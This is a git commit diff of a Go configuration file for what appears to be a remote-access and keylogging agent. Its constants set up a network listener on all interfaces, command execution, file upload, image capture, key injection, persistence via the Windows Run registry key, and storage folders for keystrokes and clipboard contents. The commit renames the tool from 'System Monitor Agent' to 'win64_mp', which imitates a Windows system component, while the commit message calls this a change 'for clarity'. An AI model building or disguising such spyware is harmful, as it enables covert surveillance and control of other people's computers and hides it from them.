Update project references from "System Monitor Agent" to "win64_mp" throughout the codebase, including changes to executable names, comments, and documentation for improved clarity and consistency.

This commit is contained in:
2026-08-28 13:30:12 +03:00
parent 09076079fb
commit 35d8332d9c
9 changed files with 17 additions and 17 deletions
+4 -4
View File
@@ -10,20 +10,20 @@ import (
const (
Version = "1.0.0"
DefaultAddr = "0.0.0.0:5032"
MutexName = "SystemMonitorAgent_Mutex"
MutexName = "win64_mp_Mutex"
RequestBodyMax = 1 << 20
MaxUploadSize = 100 << 20 // ponytail: 100MB cap; raise via env later if needed
MaxListEntries = 10000
MaxImageQuality = 100
DefaultExecTO = 30
MaxExecTO = 120
StartupValueName = "SystemMonitorAgent"
StartupValueName = "win64_mp"
StartupRunKey = `Software\Microsoft\Windows\CurrentVersion\Run`
MaxInputText = 4096
DefaultKeyDelayMs = 25
MaxKeyDelayMs = 200
AppDataDir = "SystemMonitorAgent"
InstalledExeName = "SystemMonitorAgent.exe"
AppDataDir = "win64_mp"
InstalledExeName = "win64_mp.exe"
KeylogSubdir = "keystrokes"
ClipboardSubdir = "clipboard"
DefaultKeylogRetentionDays = 7